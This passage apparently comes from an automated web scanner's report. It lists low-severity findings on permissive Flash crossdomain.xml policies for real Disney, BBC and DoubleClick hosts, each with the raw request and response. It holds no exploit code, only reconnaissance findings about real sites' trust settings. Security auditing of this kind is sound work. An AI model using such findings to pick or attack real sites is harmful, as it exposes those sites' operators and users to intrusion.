HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:24:52 GMT P3P: policyref="http://info Last-Modified: Fri, 14 May 2010 21:53:13 GMT Accept-Ranges: bytes Content-Length: 1548 Connection: close Content-Type: application/xml <?xml version="1.0" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy xmlns:xsi="http://www.w3 ...[SNIP]... <allow-access-from domain="*.sueddeutsche.de" /> <allow-access-from domain="*.ooyala.com" /> <allow-access-from domain="*.cbs.com" /> <allow-access-from domain="*.fwmrm.net" /> <allow-access-from domain="*.auditude.com" /> <allow-access-from domain="*.brightcove.com" /> <allow-access-from domain="*.mavenapps.net" /> <allow-access-from domain="*.maventechnologies.com" /> <allow-access-from domain="*.grindtv.com" /> <allow-access-from domain="*.vipix.com" /> <allow-access-from domain="*.maven.net" /> <allow-access-from domain="*.mlb.com" /> <allow-access-from domain="*.broadcast.com" /> <allow-access-from domain="*.comcast.net" /> <allow-access-from domain="*.comcastonline.com" /> <allow-access-from domain="*.flickr.com" /> <allow-access-from domain="*.hotjobs.com" /> <allow-access-from domain="*.launch.com" /> <allow-access-from domain="*.overture.com" /> <allow-access-from domain="*.rivals.com" /> <allow-access-from domain="*.scrippsnewspapers.com" /> <allow-access-from domain="*.vmixcore.com" /> <allow-access-from domain="*.vmix.com" /> <allow-access-from domain="*.yahoo.com" /> <allow-access-from domain="*.yahooligans.com" /> <allow-access-from domain="*.yimg.com" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://dcl.wdpromedia.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: dcl.wdpromedia.com |
HTTP/1.0 200 OK Content-Length: 8308 Content-Type: text/xml Last-Modified: Sat, 26 Feb 2011 00:32:21 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Expires: Mon, 16 May 2011 01:27:01 GMT Cache-Control: max-age=300 Date: Mon, 16 May 2011 01:24:39 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.go.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.starwave.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.online.disney.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="espnwwos.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="disneyworldsports.disney ...[SNIP]... <allow-access-from domain="adisneyworldsports.disney ...[SNIP]... <allow-access-from domain="www.disneyyouth.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="youthprograms.disney.go ...[SNIP]... <allow-access-from domain="disneyweddings.disney.go ...[SNIP]... <allow-access-from domain="disneymeetings.disney.go ...[SNIP]... <allow-access-from domain="adisneyworldmeetings ...[SNIP]... <allow-access-from domain="dvc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="advc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="disneycruise.disney.go ...[SNIP]... <allow-access-from domain="adisneycruise.disney.go ...[SNIP]... <allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="adisneyworld.disney.go ...[SNIP]... <allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="disneyparks.disney.go.com" secure="false"/> ...[SNIP]... <allow-access-from domain="adisneyparks.disney.go ...[SNIP]... <allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="destinations.disney.go ...[SNIP]... <allow-access-from domain="adestinations.disney.go ...[SNIP]... <allow-access-from domain="radio.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="disneysmagicalbeginnings <allow-access-from domain="*.hongkongdisneyland.com ...[SNIP]... <allow-access-from domain="park.hongkongdisneyland ...[SNIP]... <allow-access-from domain="*.secure2.hongkongdi ...[SNIP]... <allow-access-from domain="*.secure.hongkongdis ...[SNIP]... <allow-access-from domain="mediacdn.hongkongdis ...[SNIP]... <allow-access-from domain="mediacdn2.hongkongdi ...[SNIP]... <allow-access-from domain="ahongkongdisneyland ...[SNIP]... <allow-access-from domain="*.secondthought.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.adtoolsinc.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.unionstudio.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cyberwocky.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="bookwdw.reservations ...[SNIP]... <allow-access-from domain="content-loc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="static-loc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="content-dev1.disney.go ...[SNIP]... <allow-access-from domain="static-dev1.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dnhwdproweb01.online ...[SNIP]... <allow-access-from domain="disneyworld-dev1.disney ...[SNIP]... <allow-access-from domain="disneyworld-sl.disney.go ...[SNIP]... <allow-access-from domain="as1.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="wdw.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="parksandresorts ...[SNIP]... <allow-access-from domain="disneyworld2-qa2.disney ...[SNIP]... <allow-access-from domain="disney.prizelogic.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.nthdegreefx.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="disneyworld-qa2-1.disney ...[SNIP]... <allow-access-from domain="disneyworld-qa2-2.disney ...[SNIP]... <allow-access-from domain="*.triggerla.com" to-port="*" /> ...[SNIP]... <allow-access-from domain="*.triggersh.com" to-port="*" /> ...[SNIP]... <allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" /> ...[SNIP]... <allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="m.disneyland.disney.go ...[SNIP]... <allow-access-from domain="m.disneyland-qa3.disney ...[SNIP]... <allow-access-from domain="m.disneyland-sl.disney.go ...[SNIP]... <allow-access-from domain="m.disneyland-dev9.disney ...[SNIP]... <allow-access-from domain="disneyland-dev9.disney.go ...[SNIP]... <allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="disneyland-lt.disney.go ...[SNIP]... <allow-access-from domain="disneyland-qa3.disney.go ...[SNIP]... <allow-access-from domain="disneyland-sl.disney.go ...[SNIP]... <allow-access-from domain="qa-generic03.disney.go ...[SNIP]... <allow-access-from domain="disneyyouth-qa5.disney.go ...[SNIP]... <allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="thismoment.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="disney.stage2.thismoment ...[SNIP]... <allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://dcl2.wdpromedia |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: dcl2.wdpromedia.com |
HTTP/1.0 200 OK Content-Length: 8308 Content-Type: text/xml Last-Modified: Sat, 26 Feb 2011 00:32:24 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Expires: Thu, 21 Apr 2011 01:15:30 GMT Cache-Control: max-age=160 Date: Mon, 16 May 2011 01:23:40 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.go.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.starwave.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.online.disney.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="espnwwos.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="disneyworldsports.disney ...[SNIP]... <allow-access-from domain="adisneyworldsports.disney ...[SNIP]... <allow-access-from domain="www.disneyyouth.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="youthprograms.disney.go ...[SNIP]... <allow-access-from domain="disneyweddings.disney.go ...[SNIP]... <allow-access-from domain="disneymeetings.disney.go ...[SNIP]... <allow-access-from domain="adisneyworldmeetings ...[SNIP]... <allow-access-from domain="dvc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="advc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="disneycruise.disney.go ...[SNIP]... <allow-access-from domain="adisneycruise.disney.go ...[SNIP]... <allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="adisneyworld.disney.go ...[SNIP]... <allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="disneyparks.disney.go.com" secure="false"/> ...[SNIP]... <allow-access-from domain="adisneyparks.disney.go ...[SNIP]... <allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="destinations.disney.go ...[SNIP]... <allow-access-from domain="adestinations.disney.go ...[SNIP]... <allow-access-from domain="radio.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="disneysmagicalbeginnings <allow-access-from domain="*.hongkongdisneyland.com ...[SNIP]... <allow-access-from domain="park.hongkongdisneyland ...[SNIP]... <allow-access-from domain="*.secure2.hongkongdi ...[SNIP]... <allow-access-from domain="*.secure.hongkongdis ...[SNIP]... <allow-access-from domain="mediacdn.hongkongdis ...[SNIP]... <allow-access-from domain="mediacdn2.hongkongdi ...[SNIP]... <allow-access-from domain="ahongkongdisneyland ...[SNIP]... <allow-access-from domain="*.secondthought.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.adtoolsinc.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.unionstudio.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cyberwocky.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="bookwdw.reservations ...[SNIP]... <allow-access-from domain="content-loc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="static-loc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="content-dev1.disney.go ...[SNIP]... <allow-access-from domain="static-dev1.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dnhwdproweb01.online ...[SNIP]... <allow-access-from domain="disneyworld-dev1.disney ...[SNIP]... <allow-access-from domain="disneyworld-sl.disney.go ...[SNIP]... <allow-access-from domain="as1.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="wdw.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="parksandresorts ...[SNIP]... <allow-access-from domain="disneyworld2-qa2.disney ...[SNIP]... <allow-access-from domain="disney.prizelogic.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.nthdegreefx.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="disneyworld-qa2-1.disney ...[SNIP]... <allow-access-from domain="disneyworld-qa2-2.disney ...[SNIP]... <allow-access-from domain="*.triggerla.com" to-port="*" /> ...[SNIP]... <allow-access-from domain="*.triggersh.com" to-port="*" /> ...[SNIP]... <allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" /> ...[SNIP]... <allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="m.disneyland.disney.go ...[SNIP]... <allow-access-from domain="m.disneyland-qa3.disney ...[SNIP]... <allow-access-from domain="m.disneyland-sl.disney.go ...[SNIP]... <allow-access-from domain="m.disneyland-dev9.disney ...[SNIP]... <allow-access-from domain="disneyland-dev9.disney.go ...[SNIP]... <allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="disneyland-lt.disney.go ...[SNIP]... <allow-access-from domain="disneyland-qa3.disney.go ...[SNIP]... <allow-access-from domain="disneyland-sl.disney.go ...[SNIP]... <allow-access-from domain="qa-generic03.disney.go ...[SNIP]... <allow-access-from domain="disneyyouth-qa5.disney.go ...[SNIP]... <allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="thismoment.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="disney.stage2.thismoment ...[SNIP]... <allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://disneycruise |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: disneycruise.disney.go |
HTTP/1.1 200 OK Cache-Control: max-age=300 Content-Length: 8308 Content-Type: text/xml Last-Modified: Sat, 26 Feb 2011 00:32:21 GMT Accept-Ranges: bytes Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Cache-Expires: Mon, 16 May 2011 01:35:44 GMT Date: Mon, 16 May 2011 01:35:02 GMT Connection: close <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.go.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="avmk.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="vmk.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.disney.go.com" secure="false" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.starwave.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.online.disney.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="espnwwos.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="disneyworldsports.disney ...[SNIP]... <allow-access-from domain="adisneyworldsports.disney ...[SNIP]... <allow-access-from domain="www.disneyyouth.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="youthprograms.disney.go ...[SNIP]... <allow-access-from domain="disneyweddings.disney.go ...[SNIP]... <allow-access-from domain="disneymeetings.disney.go ...[SNIP]... <allow-access-from domain="adisneyworldmeetings ...[SNIP]... <allow-access-from domain="dvc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="jp.dvc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvcmember.disney.co.jp" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="advc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa1-1.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa1-2.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-1.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="dvc-qa2-2.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="adisneycruise.disney.go ...[SNIP]... <allow-access-from domain="disneyworld.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="adisneyworld.disney.go ...[SNIP]... <allow-access-from domain="secure.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="secure.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="disneyparks.disney.go.com" secure="false"/> ...[SNIP]... <allow-access-from domain="adisneyparks.disney.go ...[SNIP]... <allow-access-from domain="disneyland.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="adisneyland.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="abd.disney.go.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="abd.disney.go.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="destinations.disney.go ...[SNIP]... <allow-access-from domain="adestinations.disney.go ...[SNIP]... <allow-access-from domain="radio.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.hongkongdisneyland.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="disneysmagicalbeginnings <allow-access-from domain="*.hongkongdisneyland.com ...[SNIP]... <allow-access-from domain="park.hongkongdisneyland ...[SNIP]... <allow-access-from domain="*.secure2.hongkongdi ...[SNIP]... <allow-access-from domain="*.secure.hongkongdis ...[SNIP]... <allow-access-from domain="mediacdn.hongkongdis ...[SNIP]... <allow-access-from domain="mediacdn2.hongkongdi ...[SNIP]... <allow-access-from domain="ahongkongdisneyland ...[SNIP]... <allow-access-from domain="*.secondthought.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.adtoolsinc.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.unionstudio.net" secure="false" /> ...[SNIP]... <allow-access-from domain="*.cyberwocky.com" secure="false" /> ...[SNIP]... <allow-access-from domain="*.peelinteractive.com" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.northkingdom.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="bookwdw.reservations ...[SNIP]... <allow-access-from domain="content-loc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="static-loc.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="content-dev1.disney.go ...[SNIP]... <allow-access-from domain="static-dev1.disney.go.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dnhwdproweb01.online ...[SNIP]... <allow-access-from domain="disneyworld-dev1.disney ...[SNIP]... <allow-access-from domain="disneyworld-sl.disney.go ...[SNIP]... <allow-access-from domain="as1.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="wdw.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="wdw1.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="wdw2.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="*.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="parksandresorts ...[SNIP]... <allow-access-from domain="disneyworld2-qa2.disney ...[SNIP]... <allow-access-from domain="disney.prizelogic.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="www.nthdegreefx.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="disneyworld-qa2-1.disney ...[SNIP]... <allow-access-from domain="disneyworld-qa2-2.disney ...[SNIP]... <allow-access-from domain="*.triggerla.com" to-port="*" /> ...[SNIP]... <allow-access-from domain="*.triggersh.com" to-port="*" /> ...[SNIP]... <allow-access-from domain="*.omniticket.net" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="*.omniticket.net" to-ports="*" secure="false"/> ...[SNIP]... <allow-access-from domain="*.omniticket.com" to-ports="*" secure="true"/> ...[SNIP]... <allow-access-from domain="dnhwdproweb01.wdig.com" to-port="*" /> ...[SNIP]... <allow-access-from domain="dlr1.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="dlr2.wdpromedia.com" to-ports="*" /> ...[SNIP]... <allow-access-from domain="m.disneyland.disney.go ...[SNIP]... <allow-access-from domain="m.disneyland-qa3.disney ...[SNIP]... <allow-access-from domain="m.disneyland-sl.disney.go ...[SNIP]... <allow-access-from domain="m.disneyland-dev9.disney ...[SNIP]... <allow-access-from domain="disneyland-dev9.disney.go ...[SNIP]... <allow-access-from domain="disneyland-local.go.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="disneyland-lt.disney.go ...[SNIP]... <allow-access-from domain="disneyland-qa3.disney.go ...[SNIP]... <allow-access-from domain="disneyland-sl.disney.go ...[SNIP]... <allow-access-from domain="qa-generic03.disney.go ...[SNIP]... <allow-access-from domain="disneyyouth-qa5.disney.go ...[SNIP]... <allow-access-from domain="disney.thismoment.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="thismoment.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="disney.stage2.thismoment ...[SNIP]... <allow-access-from domain="disneyinstitute.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="dvc-qa01.disney.go.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="dvc-qa02.disney.go.com" to-ports="*" secure="false" /> ...[SNIP]... <allow-access-from domain="dvc-nap7.disney.go.com" to-ports="*" secure="false" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://feeds.bbci.co.uk |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: feeds.bbci.co.uk |
HTTP/1.0 200 OK Server: Apache Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT Content-Type: text/xml Cache-Control: max-age=120 Expires: Sun, 15 May 2011 21:21:04 GMT Date: Sun, 15 May 2011 21:19:04 GMT Content-Length: 1081 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="downloads.bbc.co.uk" /> <allow-access-from domain="www.bbcamerica.com" /> <allow-access-from domain="*.bbcamerica.com" /> <allow-access-from domain="www.bbc.co.uk" /> <allow-access-from domain="news.bbc.co.uk" /> <allow-access-from domain="newsimg.bbc.co.uk"/> <allow-access-from domain="nolpreview11.newsonline <allow-access-from domain="newsrss.bbc.co.uk" /> <allow-access-from domain="newsapi.bbc.co.uk" /> <allow-access-from domain="extdev.bbc.co.uk" /> <allow-access-from domain="stats.bbc.co.uk" /> <allow-access-from domain="*.bbc.co.uk"/> <allow-access-from domain="*.bbci.co.uk"/> <allow-access-from domain="*.bbc.com"/> ...[SNIP]... <allow-access-from domain="jam.bbc.co.uk" /> <allow-access-from domain="dc01.dc.bbc.co.uk" /> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://googleads.g |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: googleads.g.doubleclick |
HTTP/1.0 200 OK P3P: policyref="http:/ Content-Type: text/x-cross-domain Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT Date: Sun, 15 May 2011 10:44:43 GMT Expires: Mon, 16 May 2011 10:44:43 GMT X-Content-Type-Options: nosniff Server: cafe X-XSS-Protection: 1; mode=block Age: 38783 Cache-Control: public, max-age=86400 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="maps.gstatic.com" /> <allow-access-from domain="maps.gstatic.cn" /> <allow-access-from domain="*.googlesyndication.com" /> <allow-access-from domain="*.google.com" /> <allow-access-from domain="*.google.ae" /> <allow-access-from domain="*.google.at" /> <allow-access-from domain="*.google.be" /> <allow-access-from domain="*.google.ca" /> <allow-access-from domain="*.google.ch" /> <allow-access-from domain="*.google.cn" /> <allow-access-from domain="*.google.co.il" /> <allow-access-from domain="*.google.co.in" /> <allow-access-from domain="*.google.co.jp" /> <allow-access-from domain="*.google.co.kr" /> <allow-access-from domain="*.google.co.nz" /> <allow-access-from domain="*.google.co.sk" /> <allow-access-from domain="*.google.co.uk" /> <allow-access-from domain="*.google.co.ve" /> <allow-access-from domain="*.google.co.za" /> <allow-access-from domain="*.google.com.ar" /> <allow-access-from domain="*.google.com.au" /> <allow-access-from domain="*.google.com.br" /> <allow-access-from domain="*.google.com.gr" /> <allow-access-from domain="*.google.com.hk" 